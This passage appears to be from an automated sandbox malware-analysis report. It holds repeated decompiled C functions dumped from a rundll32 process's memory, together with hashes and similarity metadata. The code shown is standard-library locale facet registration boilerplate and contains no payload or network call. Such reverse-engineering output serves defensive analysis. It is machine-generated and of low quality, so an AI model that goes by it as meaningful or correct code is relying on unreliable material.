                				_t43 =  *0x20681c98 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205eecb6;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681c98 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681c98; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205eecdb;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205eecdd;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205eed6a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205eed03;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205eed01;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205eed03;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205eed6a;
                				if (_t79 == 0) goto 0x205eed12;
                				goto 0x205eed6a;
                				E00000215215205EF5A0(0, 0, _t57,  &_a24, _t80);
                				if (_t53 != 0xffffffff) goto 0x205eed41;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681cd8 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}



















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmoneypunct
                • String ID:
                • API String ID: 18546225-0
                • Opcode ID: b7eb96f6c65164070f922ad073de2a418dd0f5d755e3369380727ea95ee686a8
                • Instruction ID: 9ffebcb842f689651241a5ad9474e56037d7446f8bbbfaf9d9d2fa66cad4c3f5
                • Opcode Fuzzy Hash: b7eb96f6c65164070f922ad073de2a418dd0f5d755e3369380727ea95ee686a8
                • Instruction Fuzzy Hash: 63317033356E24C1EB219B16E9582E96365EBE47E4F680292DE9D077EDDE38D8428700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D8CDC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t42;
                				void* _t43;
                				void* _t45;
                				intOrPtr _t53;
                				intOrPtr _t54;
                				intOrPtr _t55;
                				intOrPtr _t58;
                				signed long long _t59;
                				intOrPtr _t66;
                				intOrPtr* _t80;
                				long long _t81;
                				void* _t82;
                				void* _t83;
                
                				_t53 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t82 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t81 =  *0x20681bd0; // 0x0
                				_a24 = _t81;
                				_t58 =  *0x20681b20; // 0x0
                				if (_t58 != 0) goto 0x205d8d57;
                				E00000215215205D19DC(0,  &_a8);
                				_t45 =  *0x20681b20 - _t58; // 0x0
                				if (_t45 != 0) goto 0x205d8d46;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b20 = _t53;
                				_t29 = E00000215215205D1A5C(_t53,  &_a8);
                				_t59 =  *0x20681b20; // 0x0
                				_t66 = _a8;
                				if (_t59 -  *((intOrPtr*)(_t66 + 0x18)) >= 0) goto 0x205d8d6b;
                				_t54 =  *((intOrPtr*)(_t66 + 0x10));
                				goto 0x205d8d6d;
                				if ( *((intOrPtr*)(_t54 + _t59 * 8)) != 0) goto 0x205d8dfa;
                				if ( *((intOrPtr*)(_t66 + 0x24)) == dil) goto 0x205d8d93;
                				E00000215215205D6CC0(_t29);
                				if (_t59 -  *((intOrPtr*)(_t54 + 0x18)) >= 0) goto 0x205d8d91;
                				_t55 =  *((intOrPtr*)(_t54 + 0x10));
                				goto 0x205d8d93;
                				if ( *((intOrPtr*)(_t55 + _t59 * 8)) != 0) goto 0x205d8dfa;
                				if (_t81 == 0) goto 0x205d8da2;
                				goto 0x205d8dfa;
                				E00000215215205DBC40(0, _t42, _t43, _t59,  &_a24, _t82, _t83);
                				if (_t55 != 0xffffffff) goto 0x205d8dd1;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t59,  &_v48, 0x2066bb90, _t81);
                				asm("int3");
                				_t80 = _a24;
                				 *0x20681bd0 = _t80;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t80 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t55, _t80),  &_a16);
                			}






















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowcollate
                • String ID:
                • API String ID: 1144514573-0
                • Opcode ID: 7664db7a8260f0a43f4f5b3d2543e00a334a7409cc2449b6c80fd0beb6521428
                • Instruction ID: 11d8330e8c599f63c0e5b6c4b6bf22ccce10b13c5ea7fa0e005713c49ebe53c1
                • Opcode Fuzzy Hash: 7664db7a8260f0a43f4f5b3d2543e00a334a7409cc2449b6c80fd0beb6521428
                • Instruction Fuzzy Hash: B0312E37306E64C1EA25AB15E5582E96365EBF4BE0F180293DE6D07BEDDB38D4478700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E00000215215205D8E14(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                				void* _t81;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c10; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681938; // 0x0
                				if (_t56 != 0) goto 0x205d8e8f;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681938 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d8e7e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681938 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681938; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d8ea3;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d8ea5;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d8f32;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d8ecb;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d8ec9;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d8ecb;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d8f32;
                				if (_t79 == 0) goto 0x205d8eda;
                				goto 0x205d8f32;
                				E00000215215205DBD60(0, 0, _t57,  &_a24, _t80, _t79, _t80, _t81);
                				if (_t53 != 0xffffffff) goto 0x205d8f09;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c10 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}





















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowctype
                • String ID:
                • API String ID: 3748636215-0
                • Opcode ID: 8b9c68511d25b6fecb829fe2f47a64f8a16cd5e3d06e9751f2536ea882d89b5e
                • Instruction ID: 4f486ac5eb9b0f2c90bf17d08595a3b73eef32c5b804ae89fefaaba0f3de29b6
                • Opcode Fuzzy Hash: 8b9c68511d25b6fecb829fe2f47a64f8a16cd5e3d06e9751f2536ea882d89b5e
                • Instruction Fuzzy Hash: 65314F33307E24C1EB219B15E9582E96365EBE4BE0F190292DE5D47BEDDE38D4478700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 60%
                			E00000215215205D8F4C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                				void* _t81;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681bb0; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681920; // 0x0
                				if (_t56 != 0) goto 0x205d8fc7;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681920 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d8fb6;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681920 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681920; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d8fdb;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d8fdd;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d906a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9003;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9001;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d9003;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d906a;
                				if (_t79 == 0) goto 0x205d9012;
                				goto 0x205d906a;
                				E00000215215205DBE70(0, 0, _t57,  &_a24, _t80, _t79, _t80, _t81);
                				if (_t53 != 0xffffffff) goto 0x205d9041;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681bb0 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}





















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowctype
                • String ID:
                • API String ID: 3748636215-0
                • Opcode ID: 27dbf01f50d32c22c3e583ab8237cec28e54682c73bc6787fa8cbc7baa7da1a1
                • Instruction ID: ce5794b231985a1a197d4df5394c526cab2ef0834fb68996c5cf50d47cc54ee7
                • Opcode Fuzzy Hash: 27dbf01f50d32c22c3e583ab8237cec28e54682c73bc6787fa8cbc7baa7da1a1
                • Instruction Fuzzy Hash: 09313D37306E64C1EA219B15E9582E96365EBE4BE0F184292EE6D47BEDDF38D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D9084(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c38; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b78; // 0x0
                				if (_t56 != 0) goto 0x205d90ff;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b78 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d90ee;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b78 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b78; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9113;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d9115;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d91a2;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d913b;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9139;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d913b;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d91a2;
                				if (_t79 == 0) goto 0x205d914a;
                				goto 0x205d91a2;
                				E00000215215205DBF80(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d9179;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c38 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}




















                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 2159c5b4dac8b035652903f0369b496db8fdee2f66dfb148fbec41badafb11c6
                • Instruction ID: 2d0eb93bcd7379f75b426a556e52179c43d3a16df037b96973795b1664665f4b
                • Opcode Fuzzy Hash: 2159c5b4dac8b035652903f0369b496db8fdee2f66dfb148fbec41badafb11c6
                • Instruction Fuzzy Hash: D5314A37706E24C1FB219B26E9582E96365EBE4BE0F2802939E5D076EDDE34D847C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D91BC(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681bd8; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b28; // 0x0
                				if (_t56 != 0) goto 0x205d9237;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b28 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d9226;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b28 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b28; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d924b;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d924d;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d92da;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d9273;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9271;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d9273;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d92da;
                				if (_t79 == 0) goto 0x205d9282;
                				goto 0x205d92da;
                				E00000215215205DC044(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d92b1;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681bd8 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: a678ebd587474b6492c7179f4ab23335cff09dd40e9fad8dbf0461a54e0cd508
                • Instruction ID: 72d2e32c43a074c76b599d29ab48866a1298704826bcfe68d991746f62ad9b80
                • Opcode Fuzzy Hash: a678ebd587474b6492c7179f4ab23335cff09dd40e9fad8dbf0461a54e0cd508
                • Instruction Fuzzy Hash: 9A313D3B306E20D1EB259B15E5582E963A5EBF97E0F280292DE6D07BEDDA34D4478700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D92F4(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c40; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b80; // 0x0
                				if (_t56 != 0) goto 0x205d936f;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b80 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d935e;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b80 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b80; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d9383;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d9385;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9412;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d93ab;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d93a9;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d93ab;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9412;
                				if (_t79 == 0) goto 0x205d93ba;
                				goto 0x205d9412;
                				E00000215215205DC108(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d93e9;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c40 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: da167aad7856e3ba21b3be2b8ab5d094c0073e4c2c9a5ec5bb6450e266d393ff
                • Instruction ID: a40f207e77cc832641a5642f7c0d6f4c21a27441bbcba9433e0a586f10a378df
                • Opcode Fuzzy Hash: da167aad7856e3ba21b3be2b8ab5d094c0073e4c2c9a5ec5bb6450e266d393ff
                • Instruction Fuzzy Hash: 26314B37306E20C1EB259B25E5582E96365EBE4BE0F280292DE6D477EDDF34D4438700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D942C(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681be0; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b30; // 0x0
                				if (_t56 != 0) goto 0x205d94a7;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b30 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d9496;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b30 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b30; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d94bb;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d94bd;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d954a;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d94e3;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d94e1;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d94e3;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d954a;
                				if (_t79 == 0) goto 0x205d94f2;
                				goto 0x205d954a;
                				E00000215215205DC1CC(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d9521;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681be0 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 0ef970c2ea3b8764526f702f3153338c44b9fd474f913c094434638577a939ac
                • Instruction ID: c3c4746572941ec94bf1347527578996893a079be2cec264c116dff2e0afbc1d
                • Opcode Fuzzy Hash: 0ef970c2ea3b8764526f702f3153338c44b9fd474f913c094434638577a939ac
                • Instruction Fuzzy Hash: 99314A77306E20C1EA219B15E5582E963A5FFE4BE0F1802A2EE6D077EEDA34D4538700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
                			E00000215215205D9564(void* __ecx, intOrPtr __rax, long long __rbx, void* __rcx, char _a8, char _a16, void* _a24, long long _a32) {
                				char _v48;
                				long long _v56;
                				void* __rsi;
                				void* __rbp;
                				intOrPtr _t26;
                				void* _t29;
                				void* _t43;
                				intOrPtr _t51;
                				intOrPtr _t52;
                				intOrPtr _t53;
                				intOrPtr _t56;
                				signed long long _t57;
                				intOrPtr _t64;
                				intOrPtr* _t78;
                				long long _t79;
                				void* _t80;
                
                				_t51 = __rax;
                				_v56 = 0xfffffffe;
                				_a32 = __rbx;
                				_t80 = __rcx;
                				E00000215215205D19DC(0,  &_a16);
                				_t79 =  *0x20681c48; // 0x0
                				_a24 = _t79;
                				_t56 =  *0x20681b88; // 0x0
                				if (_t56 != 0) goto 0x205d95df;
                				E00000215215205D19DC(0,  &_a8);
                				_t43 =  *0x20681b88 - _t56; // 0x0
                				if (_t43 != 0) goto 0x205d95ce;
                				_t26 =  *0x20681908; // 0x0
                				 *0x20681908 = _t26 + 1;
                				 *0x20681b88 = _t51;
                				_t29 = E00000215215205D1A5C(_t51,  &_a8);
                				_t57 =  *0x20681b88; // 0x0
                				_t64 = _a8;
                				if (_t57 -  *((intOrPtr*)(_t64 + 0x18)) >= 0) goto 0x205d95f3;
                				_t52 =  *((intOrPtr*)(_t64 + 0x10));
                				goto 0x205d95f5;
                				if ( *((intOrPtr*)(_t52 + _t57 * 8)) != 0) goto 0x205d9682;
                				if ( *((intOrPtr*)(_t64 + 0x24)) == dil) goto 0x205d961b;
                				E00000215215205D6CC0(_t29);
                				if (_t57 -  *((intOrPtr*)(_t52 + 0x18)) >= 0) goto 0x205d9619;
                				_t53 =  *((intOrPtr*)(_t52 + 0x10));
                				goto 0x205d961b;
                				if ( *((intOrPtr*)(_t53 + _t57 * 8)) != 0) goto 0x205d9682;
                				if (_t79 == 0) goto 0x205d962a;
                				goto 0x205d9682;
                				E00000215215205DC290(0, 0, _t57,  &_a24, _t80, _t79, _t80);
                				if (_t53 != 0xffffffff) goto 0x205d9659;
                				E00000215215205B7290( &_v48);
                				E00000215215205F9940(_t57,  &_v48, 0x2066bb90, _t79);
                				asm("int3");
                				_t78 = _a24;
                				 *0x20681c48 = _t78;
                				0x205f5ad4();
                				 *((long long*)( *((intOrPtr*)( *_t78 + 8))))();
                				return E00000215215205D1A5C(E00000215215205D6C88(_t53, _t78),  &_a16);
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowmessages
                • String ID:
                • API String ID: 3662767126-0
                • Opcode ID: 026dc5216dc0aa7883aad31ee49c7557016df84f4355eefaa5ec4ae0ae8d509d
                • Instruction ID: 8eee153ed6ad32436623fd57ad0578f1cd93a15d0e04a1d628a115147397d5a8
                • Opcode Fuzzy Hash: 026dc5216dc0aa7883aad31ee49c7557016df84f4355eefaa5ec4ae0ae8d509d
                • Instruction Fuzzy Hash: F7314D37306E20C1EB219B25E5582E96365EFE4BE0F2802A2AE5D077EDDE34D447C700
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 59%
